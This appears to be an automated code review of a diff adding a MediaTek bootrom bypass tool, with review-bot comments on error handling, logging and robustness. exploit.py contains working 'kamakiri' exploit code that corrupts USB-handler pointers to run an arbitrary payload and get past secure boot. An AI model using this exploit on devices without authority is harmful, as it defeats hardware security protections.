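Review bot: The search loop at the end of bruteforce (`for address in range(dump_ptr, 0xffff, 4)`) has no return after it, so when the range is exhausted without a 0x40-byte reply the function returns None and main's `found, dump_ptr = bruteforce(...)` dies with a TypeError on unpacking instead of a clear message; add `return (False, address + 4)` or `raise RuntimeError("no usable pointer found below 0xffff")` after the loop. The two bare `except:` clauses around `device.cmd_da(0, 0, 1)` / `device.read32(addr)` also catch KeyboardInterrupt and SystemExit, so Ctrl-C during a long sweep is swallowed; `except Exception: pass` keeps the best-effort intent (the comment `# reset command state, reply is irrelevant` would also explain why the result is ignored). `import struct` is unused in this module.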
@@ -0,0 +1,21 @@ +import struct + + +def raise_(ex): + raise ex + + +def to_bytes(value, size=1, endian='>'): + return { + 1: lambda: struct.pack(endian + 'B', value), + 2: lambda: struct.pack(endian + 'H', value), + 4: lambda: struct.pack(endian + 'I', value) + }.get(size, lambda: raise_(RuntimeError("invalid size")))() + + +def from_bytes(value, size=1, endian='>'): + return { + 1: lambda: struct.unpack(endian + 'B', value)[0], + 2: lambda: struct.unpack(endian + 'H', value)[0], + 4: lambda: struct.unpack(endian + 'I', value)[0] + }.get(size, lambda: raise_(RuntimeError("invalid size")))() diff --git a/src/config.py b/src/config.py new file mode 100644 index 0000000000000000000000000000000000000000..1a52a7d7ac02e6e58cfd206923969e42bac94ce8 --- /dev/null +++ b/src/config.py 
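Review bot: `from_bytes` hands a buffer of the wrong length straight to `struct.unpack`, so the many `from_bytes(status, 2)` calls in device.py turn a short or empty USB read into `struct.error: unpack requires a buffer of 2 bytes`, which is hard to relate to the device going silent; guard it with `if len(value) != size: raise RuntimeError("expected {} bytes, got {}".format(size, len(value)))` before unpacking. The dict-of-lambdas plus the `raise_` helper is a roundabout way to pick a format character — a `{1: 'B', 2: 'H', 4: 'I'}` lookup followed by a single `struct.pack`/`struct.unpack` reads more directly and can raise the same RuntimeError on an unsupported size. A one-line docstring on each helper stating that the default byte order is big-endian (`'>'`) would save callers from re-deriving it, since device.py and exploit.py mix both orders.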
@@ -0,0 +1,61 @@ +import json5 + + +class Config: + watchdog_address: int = 0x10007000 + uart_base: int = 0x11002000 + payload_address: int = 0x100A00 + var_0: int = None + var_1: int = 0xA + payload: str + crash_method: int = 0 + ptr_usbdl: int = None + ptr_da: int = None + + def default(self, hw_code): + config = open("default_config.json5") + self.from_file(config, hw_code) + config.close() + + return self + + def from_file(self, config, hw_code): + hw_code = hex(hw_code) + + config = json5.load(config) + + if hw_code in config: + self.from_dict(config[hw_code]) + else: + raise NotImplementedError("Can't find {} hw_code in config".format(hw_code)) + + return self + + def from_dict(self, entry): + if "watchdog_address" in entry: + self.watchdog_address = entry["watchdog_address"] + + if "uart_base" in entry: + self.uart_base = entry["uart_base"] + + if "payload_address" in entry: + self.payload_address = entry["payload_address"] + + if "var_0" in entry: + self.var_0 = entry["var_0"] + + if "var_1" in entry: + self.var_1 = entry["var_1"] + + if "crash_method" in entry: + self.crash_method = entry["crash_method"] + + if "ptr_usbdl" in entry: + self.ptr_usbdl = entry["ptr_usbdl"] + + if "ptr_da" in entry: + self.ptr_da = entry["ptr_da"] + + self.payload = entry["payload"] + + return self diff --git a/src/device.py b/src/device.py new file mode 100644 index 0000000000000000000000000000000000000000..49fd08977313d4463d938f0917f96153d2f7545b --- /dev/null +++ b/src/device.py 
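Review bot: `Config.default` opens `"default_config.json5"` relative to the current working directory, while main.py checks for `exploits_collection/default_config.json5` (DEFAULT_CONFIG) before calling it, so the existence check passes and `default()` then raises FileNotFoundError unless a second copy happens to sit in the CWD; no default_config.json5 is added anywhere in this diff as far as visible, so the two paths should at least be unified — e.g. `os.path.join(os.path.dirname(__file__), "..", "exploits_collection", "default_config.json5")` (with `import os`), or a path parameter that main passes in. Both `default` and `from_file` read the file without `with`, so the handle leaks when `json5.load` raises; use `with open(path) as config:`. Since every value loaded here (watchdog_address, payload_address, ptr_da, the payload file name) is written to, read from, or executed on the device, a class docstring noting that config files are trusted input and are not validated would help future maintainers.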
@@ -0,0 +1,343 @@ +from src.common import to_bytes, from_bytes +from src.logger import log +import usb +import usb.backend.libusb1 +import usb.backend.libusb0 +from ctypes import c_void_p, c_int +import array +import os + +import time + +BAUD = 115200 +TIMEOUT = 1 +VID = "0E8D" +PID = "0003" + + +class Device: + def __init__(self, port=None): + self.udev = None + self.dev = None + self.rxbuffer = array.array('B') + self.preloader = False + self.timeout = TIMEOUT + self.usbdk = False + self.libusb0 = False + + if os.name == 'nt': + try: + file_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "..") + try: + os.add_dll_directory(file_dir) + except Exception: + pass + os.environ['PATH'] = file_dir + ';' + os.environ['PATH'] + except Exception: + pass + + def find(self, wait=False): + if self.dev: + raise RuntimeError("Device already found") + + try: + self.backend = usb.backend.libusb1.get_backend(find_library=lambda x: "libusb-1.0.dll") + if self.backend: + try: + self.backend.lib.libusb_set_option.argtypes = [c_void_p, c_int] + self.backend.lib.libusb_set_option(self.backend.ctx, 1) # <--- this is the magic call to enable usbdk mode + self.usbdk = True + except ValueError: + log("Failed enabling UsbDk mode, please use 64-Bit Python and 64-Bit UsbDk") + else: + self.backend = usb.backend.libusb1.get_backend() + except usb.core.USBError: + self.backend = usb.backend.libusb1.get_backend() + + log("Waiting for device") + if wait: + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + while self.udev: + time.sleep(0.25) + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + self.udev = None + while not self.udev: + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + if self.udev: + break + time.sleep(0.25) + + log("Found device = {0:04x}:{1:04x}".format(self.udev.idVendor, self.udev.idProduct)) + self.dev = self + + try: + if self.udev.is_kernel_driver_active(0): + self.udev.detach_kernel_driver(0) 
+ + if self.udev.is_kernel_driver_active(1): + self.udev.detach_kernel_driver(1) + + except (NotImplementedError, usb.core.USBError): + pass + + try: + self.configuration = self.udev.get_active_configuration() + except (usb.core.USBError, NotImplementedError) as e: + if type(e) is usb.core.USBError and e.errno == 13 or type(e) is NotImplementedError: + log("Failed to enable libusb1, is UsbDk installed?") + log("Falling back to libusb0 (kamakiri only)") + self.backend = usb.backend.libusb0.get_backend() + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + self.libusb0 = True + try: + self.udev.set_configuration() + except AttributeError: + log("Failed to enable libusb0") + exit(1) + + if self.udev.idProduct != int(PID, 16): + self.preloader = True + else: + try: + self.udev.set_configuration(1) + usb.util.claim_interface(self.udev, 0) + usb.util.claim_interface(self.udev, 1) + except usb.core.USBError: + pass + + cdc_if = usb.util.find_descriptor(self.udev.get_active_configuration(), bInterfaceClass=0xA) + self.ep_in = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_IN) + self.ep_out = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_OUT) + + try: + self.udev.ctrl_transfer(0x21, 0x20, 0, 0, array.array('B', to_bytes(BAUD, 4 , '<') + b"\x00\x00\x08")) + except usb.core.USBError: + pass + + return self + + @staticmethod + def check(test, gold): + if test != gold: + if type(test) == bytes: + test = "0x" + test.hex() + else: + test = hex(test) + + if type(gold) == bytes: + gold = "0x" + gold.hex() + else: + gold = hex(gold) + + raise RuntimeError("Unexpected output, expected {} got {}".format(gold, test)) + + def close(self): + self.dev = None + self.rxbuffer = array.array('B') + try: + usb.util.release_interface(self.udev, 0) + usb.util.release_interface(self.udev, 1) + except Exception: + pass + 
if not self.usbdk: + try: + self.udev.reset() + except Exception: + pass + try: + self.udev.attach_kernel_driver(0) + except Exception: + pass + try: + self.udev.attach_kernel_driver(1) + except Exception: + pass + if not self.usbdk: + try: + usb.util.dispose_resources(self.udev) + except Exception: + pass + self.udev = None + time.sleep(1) + + def handshake(self): + sequence = b"\xA0\x0A\x50\x05" + i = 0 + while i < len(sequence): + self.write(sequence[i]) + reply = self.read(1) + if reply and reply[0] == ~sequence[i] & 0xFF: + i += 1 + else: + i = 0 + + def echo(self, words, size=1): + self.write(words, size) + self.check(from_bytes(self.read(size), size), words) + + def read(self, size=1): + offset = 0 + data = b"" + while len(self.rxbuffer) < size: + try: + self.rxbuffer.extend(self.ep_in.read(self.ep_in.wMaxPacketSize, self.timeout * 1000)) + except usb.core.USBError as e: + if e.errno == 110: + self.udev.reset() + break + if size <= len(self.rxbuffer): + result = self.rxbuffer[:size] + self.rxbuffer = self.rxbuffer[size:] + else: + result = self.rxbuffer + self.rxbuffer = array.array('B') + return bytes(result) + + def read32(self, addr, size=1): + result = [] + + self.echo(0xD1) + self.echo(addr, 4) + self.echo(size, 4) + + status = self.dev.read(2) + if from_bytes(status, 2) > 0xff: + raise RuntimeError("status is {}".format(status.hex())) + + for _ in range(size): + data = from_bytes(self.dev.read(4), 4) + result.append(data) + + status = self.dev.read(2) + if from_bytes(status, 2) > 0xff: + raise RuntimeError("status is {}".format(status.hex())) + + # support scalar + if len(result) == 1: + return result[0] + else: + return result + + def write(self, data, size=1): + if type(data) != bytes: + data = to_bytes(data, size) + offset = 0 + while offset < len(data): + self.ep_out.write(data[offset:][:self.ep_out.wMaxPacketSize if len(data) - offset > self.ep_out.wMaxPacketSize else len(data) - offset], self.timeout * 1000) + offset += self.ep_out.wMaxPacketSize 
+ + def write32(self, addr, words, check_status=True): + # support scalar + if not isinstance(words, list): + words = [words] + + self.echo(0xD4) + self.echo(addr, 4) + self.echo(len(words), 4) + + self.check(self.dev.read(2), to_bytes(1, 2)) # arg check + + for word in words: + self.echo(word, 4) + + if check_status: + self.check(self.dev.read(2), to_bytes(1, 2)) # status + + def get_target_config(self): + self.echo(0xD8) + + target_config = self.dev.read(4) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + target_config = from_bytes(target_config, 4) + + secure_boot = target_config & 1 + serial_link_authorization = target_config & 2 + download_agent_authorization = target_config & 4 + + # noinspection PyCallByClass + return bool(secure_boot), bool(serial_link_authorization), bool(download_agent_authorization) + + def get_hw_code(self): + self.echo(0xFD) + + hw_code = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(hw_code, 2) + + def get_hw_dict(self): + self.echo(0xFC) + + hw_sub_code = self.dev.read(2) + hw_ver = self.dev.read(2) + sw_ver = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(hw_sub_code, 2), from_bytes(hw_ver, 2), from_bytes(sw_ver, 2) + + def send_da(self, da_address, da_len, sig_len, da): + self.echo(0xD7) + + self.echo(da_address, 4) + self.echo(da_len, 4) + self.echo(sig_len, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + self.dev.write(da) + + checksum = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(checksum, 2) + + def jump_da(self, da_address): + 
self.echo(0xD5) + + self.echo(da_address, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + def cmd_da(self, direction, offset, length, data=None, check_status = True): + self.echo(0xDA) + + self.echo(direction, 4) + self.echo(offset, 4) + self.echo(length, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + if (direction & 1) == 1: + self.dev.write(data) + else: + data = self.dev.read(length) + + if check_status: + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return data diff --git a/src/exploit.py b/src/exploit.py new file mode 100644 index 0000000000000000000000000000000000000000..e39ebea1c03cefff75c0e0961ea8445d88e0fd54 --- /dev/null +++ b/src/exploit.py 
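Review bot: `handshake` loops forever when the device never answers, because `read(1)` returns `b''` after a timeout (read breaks out on errno 110), which resets `i` to 0 and retries with no bound, so a silent device hangs the tool with no diagnostic; an optional attempt cap, as below, keeps today's behaviour by default. Relatedly, `read` returns a short buffer after a timeout and resets the device as a side effect, and every caller immediately unpacks the result with `from_bytes`, so the user sees a `struct.error` instead of a timeout message — either raise a RuntimeError from `read` when fewer than `size` bytes arrived, or document the short-read contract in a docstring so callers check `len()`. The errno-110 comparison is Linux's ETIMEDOUT; whether pyusb reports the same errno under libusb1/UsbDk on Windows is not visible here, so it is worth confirming (pyusb ≥ 1.1 exposes `usb.core.USBTimeoutError`, which would be portable). `__init__` also prepends the checkout directory to PATH and `add_dll_directory` so the vendored `libusb-1.0.dll` wins the DLL search; recording its upstream libusb release and SHA-256 in the README would let users verify the binary being loaded into the process.
```python
    def handshake(self, max_attempts=None):
        """Send the start-up byte sequence and wait for each byte's complement.

        max_attempts: give up with RuntimeError after this many failed or
        silent replies; None (the default) retries forever as before.
        """
        sequence = b"\xA0\x0A\x50\x05"
        i = 0
        attempts = 0
        while i < len(sequence):
            self.write(sequence[i])
            reply = self.read(1)
            if reply and reply[0] == ~sequence[i] & 0xFF:
                i += 1
            else:
                i = 0
                attempts += 1
                if max_attempts is not None and attempts >= max_attempts:
                    raise RuntimeError("handshake failed after {} attempts".format(attempts))
```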
@@ -0,0 +1,97 @@ +from src.common import to_bytes, from_bytes +from src.logger import log + +import usb +import array + + +def exploit(device, config, payload, arguments): + + def da_read(address, length, check_result = True): + return da_read_write(0, address, length, None, check_result) + + def da_write(address, length, data, check_result = True): + return da_read_write(1, address, length, data, check_result) + + def da_read_write(direction, address, length, data = None, check_result = True): + try: + device.cmd_da(0,0,1) + device.read32(addr) + except: + pass + + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da + 8 - 3 + i, 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + + if address < 0x40: + for i in range(4): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 6 + (4 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + return device.cmd_da(direction, address, length, data, check_result) + else: + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 5 + (3 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + return device.cmd_da(direction, address - 0x40, length, data, check_result) + + + addr = config.watchdog_address + 0x50 + + if not config.ptr_usbdl or arguments.kamakiri: + log("Using kamakiri") + device.write32(addr, from_bytes(to_bytes(config.payload_address, 4), 4, '<')) + if config.var_0: + readl = config.var_0 + 0x4 + device.read32(addr - config.var_0, readl // 4) + else: + cnt = 15 + for i in range(cnt): + device.read32(addr - (cnt - i) * 4, cnt - i + 1) + + device.echo(0xE0) + + device.echo(len(payload), 4) + + status = device.read(2) + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + device.write(payload) + + # clear 4 bytes + device.read(4) + + udev = device.udev + + try: + if not config.ptr_usbdl or 
arguments.kamakiri: + try: + # noinspection PyProtectedMember + udev._ctx.managed_claim_interface = lambda *args, **kwargs: None + except AttributeError as e: + raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e + udev.ctrl_transfer(0xA1, 0, 0, config.var_1, 0) + else: + linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0]) + ptr_send = from_bytes(da_read(config.ptr_usbdl, 4), 4, '<') + 8; + da_write(config.payload_address, len(payload), payload) + da_write(ptr_send, 4, to_bytes(config.payload_address, 4, '<'), False) + + except usb.core.USBError as e: + print(e) + + # We don't need to wait long, if we succeeded + # noinspection PyBroadException + try: + device.dev.timeout = 1 + except Exception: + pass + + try: + pattern = device.read(4) + except usb.core.USBError as e: + print(e) + return False + + return pattern diff --git a/src/logger.py b/src/logger.py new file mode 100644 index 0000000000000000000000000000000000000000..43c2046275fb0975250c2684c1d022fee283795e --- /dev/null +++ b/src/logger.py @@ -0,0 +1,9 @@ +import datetime + + +def log(string): + line = "[{}] {}".format(datetime.datetime.now(), string) + print(line) + + with open("bypass_utility.log", "a") as out: + out.write(line + "\n")
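Review bot: Error reporting in `exploit()` is inconsistent with the `log` helper this file imports: both `except usb.core.USBError as e:` branches fall back to `print(e)`, so a USB failure never reaches `bypass_utility.log` while the informational message a few lines earlier (`log("Using kamakiri")`) does, and the log file a user is asked to share for diagnosis ends up missing the one line that matters. Routing them through the same helper, `log("USB error: {}".format(e))`, keeps the file a complete record of the session. Separately, the bare `except: pass` at the top of `da_read_write` also swallows `KeyboardInterrupt` and `SystemExit`; `except Exception: pass` preserves the same best-effort behaviour without hiding an interrupt. The trailing semicolon on the `ptr_send = ... + 8;` line is harmless but un-Pythonic and worth dropping.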
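Review bot: `open("bypass_utility.log", "a")` in `log()` relies on the platform default text encoding and on the current working directory, so a message containing a non-ASCII character (a libusb error string, for example) can raise `UnicodeEncodeError` under a Windows console code page and abort the caller from inside a logging call, and the file lands wherever the tool happened to be launched from. Passing the encoding explicitly removes the first problem: `with open("bypass_utility.log", "a", encoding="utf-8") as out:`. The timestamp from `datetime.datetime.now()` is naive local time; if these logs are ever correlated across machines, `datetime.datetime.now(datetime.timezone.utc)` is the less ambiguous choice, at the cost of a slightly different printed format.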
